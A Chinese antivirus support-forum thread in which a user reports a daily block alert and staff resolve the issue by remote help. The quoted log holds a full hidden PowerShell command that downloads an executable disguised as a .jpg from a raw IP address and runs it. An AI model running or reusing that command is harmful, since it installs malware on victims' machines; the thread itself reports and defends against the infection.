mobsync.exe触犯敏感动作防护规则，已阻止

15555676152 · 发表于 2020-4-19 22:27:03

本帖最后由 15555676152 于 2020-4-19 22:35 编辑

每天都会提示，日志是一样的：

===================================================================
操作进程：C:\Windows\System32\mobsync.exe
命令行：C:\Windows\System32\mobsync.exe -Embedding
父进程：C:\Windows\system32\svchost.exe
防护项目：隐藏执行PowerShell
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -nop -w hidden -c (new-object System.Net.WebClient).DownloadFile('http://123.56.123.76/pdd/InVan.jpg','C:\Users\LJL\AppData\Local\Temp\InVan.exe');start-process 'C:\Users\LJL\AppData\Local\Temp\InVan.exe';
操作结果：已阻止

==================================================================

火绒运营专员 · 发表于 2020-4-20 09:54:09

您好，建议您使用火绒全盘查杀，之后重启电脑，观察下，如果问题仍然无法解决，请添加QQ：2208613431，我们远程帮您看下问题，感谢您的反馈！

15555676152 · 发表于 2020-4-20 10:04:05

试了，不行的

15555676152 · 发表于 2020-4-20 10:07:03

加你qq了，这主要是什么问题呢？天天都会出来，有点烦人

火绒运营专员 · 发表于 2020-4-20 10:13:44

15555676152 发表于 2020-4-20 10:07
加你qq了，这主要是什么问题呢？天天都会出来，有点烦人

好的，QQ和您沟通！

火绒运营专员 · 发表于 2020-4-20 17:37:04

您好，您的问题已通过远程解决，感谢您的反馈！